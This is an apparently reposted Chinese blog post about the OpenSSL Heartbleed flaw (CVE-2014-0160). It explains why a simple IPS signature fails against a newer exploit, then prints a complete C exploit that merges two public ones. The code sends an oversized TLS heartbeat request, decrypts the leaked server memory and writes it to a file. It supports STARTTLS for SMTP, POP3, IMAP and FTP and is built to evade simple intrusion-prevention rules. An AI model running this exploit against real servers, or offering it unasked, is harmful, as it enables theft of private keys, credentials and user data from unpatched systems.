关注网络与数据安全

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:389710688) ,欢迎各位同仁加入!有其它问题,请联系站长“网路游侠”,QQ:55984512


OpenSSL的heartbeat漏洞(CVE-2014-0160)

2014-04-10 17:19 推荐: 浏览: 48字号:

摘要: 这几天openssl的信息泄露漏洞闹得满城风雨,漏洞的原因http://drops.wooyun.org/papers/1381分析得很清楚了。第一个版本的EXP是针对HTTPS的,我提出作简单的IPS规则过滤。匹配tcp协议payload长度为8字节并且前6...

这几天openssl的信息泄露漏洞闹得满城风雨,漏洞的原因http://drops.wooyun.org/papers/1381分析得很清楚了。第一个版本的EXP是针对HTTPS的,我提出作简单的IPS规则过滤。匹配tcp协议payload长度为8字节并且前6个字节等于\0×18\0×03\0×02\0×00\0×03\0×01的数据包,做丢弃处理。

结果今天有老外放出一个新的EXP,https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c。它不是在TCP层去发送心跳请求,而是改成了在TLS层去做。这样,心跳请求就是加密的了,长度不固定,而且固定的字节进一步缩短,IPS规则再缩短的话就有大量误报了,估计厂商只能精确识别,简单的规则行不通了。

另外的,由于是OpenSSL的漏洞,影响面不仅仅是HTTPS,其它的应用也在范围之内,因此有了这个EXP,https://github.com/decal/ssltest-stls/blob/master/ssltest-stls.py,它可以DUMP非HTTPS的数据,如SMTPS的。

BTW,465、993、995这种端口,默认就是SSL的,不需要STARTTLS之类的指令,监听25端口的SMTP默认明文,但是有的可以用STARTTLS要求开启加密隧道。

有鉴于此,我把这两个EXP整合了一下,即可以躲避简单的IPS,也可以搞SMTPS之类的服务。IMAPS的没测试,没找到合适的目标机器。

/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics.
*
*
* yunshu@outlook.com
*
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <signal.h>
#include <netdb.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <inttypes.h>
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/tls1.h>
#include <openssl/rand.h>
#include <openssl/buffer.h>
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
        (((unsigned int)(c[1]))    )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
         c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
typedef struct {
    int socket;
    SSL *sslHandle;
    SSL_CTX *sslContext;
} connection;
typedef struct {
  unsigned char type;
  short version;
  unsigned int length;
  unsigned char hbtype;
  unsigned int payload_length;
  void* payload;
} heartbeat;
int tcp_connect(char* server,int port){
    int sd,ret;
    struct hostent *host;
        struct sockaddr_in sa;
        host = gethostbyname(server);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd==-1){
        printf("[!] cannot create socket\n");
        exit(0);
    }
    sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
        bzero(&(sa.sin_zero),8);
    printf("[ connecting to %s %d/tcp\n",server,port);
        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
    if(ret==0){
        printf("[ connected to %s %d/tcp\n",server,port);
    }
    else{
        printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
        exit(0);
    }
    return sd;
}
void ssl_init(){
        SSL_load_error_strings();
        SSL_library_init();
        OpenSSL_add_all_digests();
        OpenSSL_add_all_algorithms();
        OpenSSL_add_all_ciphers();
}
connection* tls_connect(int sd){
        connection *c;
    c = malloc(sizeof(connection));
        c->socket = sd;
        c->sslHandle = NULL;
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(TLSv1_client_method());
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
        c->sslHandle = SSL_new(c->sslContext);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        if(SSL_connect(c->sslHandle)!=1)
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
        }
    return c;
}
int pre_cmd(int sd, int type){
    char buff[1024] = { 0 };
    // smtp
    if(type==1){
        char *cmd1 = "EHLO openssl.client.net\r\n";
        char *cmd2 = "STARTTLS\r\n";
        sd = get_banner( sd );
        sd = send_cmd( sd, cmd1 );
        sd = send_cmd( sd, cmd2 );
    }
    else if(type==2){
        char *cmd = "STLS\r\n";
        
        sd = get_banner( sd );
        sd = send_cmd(sd, cmd);
    }
    else if(type==3){
        char *cmd = "STARTTLS\r\n";
        sd = get_banner( sd );
        sd = send_cmd(sd, cmd);
    }
    else if(type==4){
        char *cmd = "AUTH TLS\r\n";
        sd = get_banner( sd );
        sd = send_cmd(sd, cmd);
    }
    return sd;
}
int get_banner( int sd )
{
    char buff[10240] = { 0 };
    
    memset( (void*)buff, 0, sizeof(buff) );
    recv(sd, buff, sizeof(buff)-1, 0 );
    printf( "[ recv: %s\n", buff );
    return sd;
}
    
int send_cmd( int sd, char *cmd )
{
    char buff[10240] = { 0 };
    send(sd, (void *)cmd, strlen(cmd), 0 );
    printf( "[ send: %s\n", cmd );
    memset( (void*)buff, 0, sizeof(buff) );
    recv(sd, buff, sizeof(buff)-1, 0 );
    printf( "[ recv: %s\n", buff );
    return sd;
}
    
void* heartbleed(connection *c){
    unsigned char *buf, *p;
        int ret;
    buf = OPENSSL_malloc(1 + 2);
        p = buf;
        *p++ = TLS1_HB_REQUEST;
    
    s2n(0xffff,p);
    printf("[ setting heartbeat payload_length to 65535 bytes\n");
    
    printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n");
        ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
        OPENSSL_free(buf);
    printf( "[ exp send finished.\n" );
    return c;
}
void* sneakyleaky(connection *c,char* filename, int verbose){
    char *p;
        int ssl_major,ssl_minor,al;
        int enc_err,n,i;
        SSL3_RECORD *rr;
        SSL_SESSION *sess;
    SSL* s;
        unsigned char md[EVP_MAX_MD_SIZE];
        short version;
        unsigned mac_size, orig_len;
        size_t extra;
        rr= &(c->sslHandle->s3->rrec);
        sess=c->sslHandle->session;
        s = c->sslHandle;
        if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
                extra=SSL3_RT_MAX_EXTRA;
        else
                extra=0;
        if ((s->rstate != SSL_ST_READ_BODY) ||
                (s->packet_length < SSL3_RT_HEADER_LENGTH)) {
                        n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
                        if (n <= 0)
                                goto apple;
                        s->rstate=SSL_ST_READ_BODY;
                        p=s->packet;
                        rr->type= *(p++);
                        ssl_major= *(p++);
                        ssl_minor= *(p++);
                        version=(ssl_major<<8)|ssl_minor;
                        n2s(p,rr->length);
            if(rr->type==24){
                printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
            }
            else{
                printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
                s->packet_length=0;
                goto apple;
            }
        }
        if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
                i=rr->length;
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple;
        }
    printf("[ decrypting and decompressing SSL packet\n");
        s->rstate=SSL_ST_READ_HEADER;
        rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
        rr->data=rr->input;
        tls1_enc(s,0);
        if(verbose==1){
                { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
                printf("\n");
        }
        if((sess != NULL) &&
            (s->enc_read_ctx != NULL) &&
            (EVP_MD_CTX_md(s->read_hash) != NULL))
                {
                unsigned char *mac = NULL;
                unsigned char mac_tmp[EVP_MAX_MD_SIZE];
                mac_size=EVP_MD_CTX_size(s->read_hash);
                OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
                orig_len = rr->length+((unsigned int)rr->type>>8);
                if(orig_len < mac_size ||
                  (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
                   orig_len < mac_size+1)){
                        al=SSL_AD_DECODE_ERROR;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
                }
                if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
                        mac = mac_tmp;
                        ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
                        rr->length -= mac_size;
                }
                else{
                        rr->length -= mac_size;
                        mac = &rr->data[rr->length];
                }
                i = tls1_mac(s,md,0);
                if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
                        enc_err = -1;
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
                        enc_err = -1;
                }
        if(enc_err < 0){
                al=SSL_AD_BAD_RECORD_MAC;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
                goto apple;
        }
        if(s->expand != NULL){
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
                        al=SSL_AD_RECORD_OVERFLOW;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
                        goto apple;
                        }
                if (!ssl3_do_uncompress(s)) {
                        al=SSL_AD_DECOMPRESSION_FAILURE;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
                        goto apple;
                        }
                }
        if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
                al=SSL_AD_RECORD_OVERFLOW;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
                goto apple;
        }
        rr->off=0;
        s->packet_length=0;
    printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
    int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
        write(fd,s->s3->rrec.data,s->s3->rrec.length);
        close(fd);
    printf("[ wrote %d bytes to file '%s'\n",rr->length, filename);
    printf("[ done.\n");
    exit(0);
apple:
        printf("[ problem handling SSL record packet - wrong type?\n");
}
void usage(){
    printf("[\n");
    printf("[ --server|-s <ip/dns>    - the server to target\n");
    printf("[ --port|-p   <port>      - the port to target\n");
    printf("[ --file|-f   <filename>  - file to write data to\n");
    printf("[ --type|-t               - select service type to try\n");
    printf("[                           0 = default using ssl tunnel, don't need STARTTLS, just like 443(https),465(smtps),995(pop3s),993(imaps)\n");
    printf("[               1 = smtp, 25\n");
    printf("[               2 = pop3, 110\n");
    printf("[               3 = imap, 389\n");
    printf("[               4 = ftp, 21\n");
    printf("[\n");
    printf("[ --verbose|-v            - output leak to screen\n");
    printf("[ --help|-h               - this output\n");
    printf("[\n");
    exit(0);
}
int main(int argc, char* argv[]){
    int ret, port, userc, index;
    int type = 1, udp = 0, verbose = 0, bind = 0;
    struct hostent *h;
    connection* c;
    char *host, *file;
    int ihost = 0, iport = 0, ifile = 0, itype = 0;
    printf("\n\n");
    printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
    printf("[ =============================================================\n");
        static struct option options[] = {
            {"server", 1, 0, 's'},
            {"port", 1, 0, 'p'},
        {"file", 1, 0, 'f'},
        {"type", 1, 0, 't'},
        {"verbose", 0, 0, 'v'},
        {"help", 0, 0,'h'}
        };
    while(userc != -1) {
            userc = getopt_long(argc,argv,"s:p:f:t:vh",options,&index);
            switch(userc) {
                    case -1:
                            break;
                    case 's':
                if(ihost==0){
                    ihost = 1;
                    h = gethostbyname(optarg);             
                    if(h==NULL){
                        printf("[!] FATAL: unknown host '%s'\n",optarg);
                        exit(1);
                    }
                    host = malloc(strlen(optarg) + 1);
                    sprintf(host,"%s",optarg);
                        }
                break;
                    case 'p':
                if(iport==0){
                    port = atoi(optarg);
                    iport = 1;
                }
                            break;
            case 'f':
                if(ifile==0){
                    file = malloc(strlen(optarg) + 1);
                    sprintf(file,"%s",optarg);
                    ifile = 1;
                }
                break;
            case 't':
                if(itype==0){
                    type = atoi(optarg);
                    itype = 1;
                }
                break;
            case 'h':
                usage();
                break;
            case 'b':
                if(ihost==0){
                    ihost = 1;
                    host = malloc(strlen(optarg)+1);
                    sprintf(host,"%s",optarg);
                    bind = 1;
                }
                break;
            case 'v':
                verbose = 1;
                break;
            default:
                break;
        }
    }
    if(ihost==0||iport==0||ifile==0||itype==0){
        printf("[ try --help\n");
        exit(0);
    }
    ssl_init();
    
    ret = tcp_connect(host, port);
    if(type!=0){
        pre_cmd(ret, type);
    }
    c = tls_connect(ret);
    heartbleed(c);
    sneakyleaky(c,file,verbose);
    printf("\n\n");
    exit(0);
}

原文地址:http://www.icylife.net/blog/?p=932

联系站长租广告位!

中国首席信息安全官
Copy link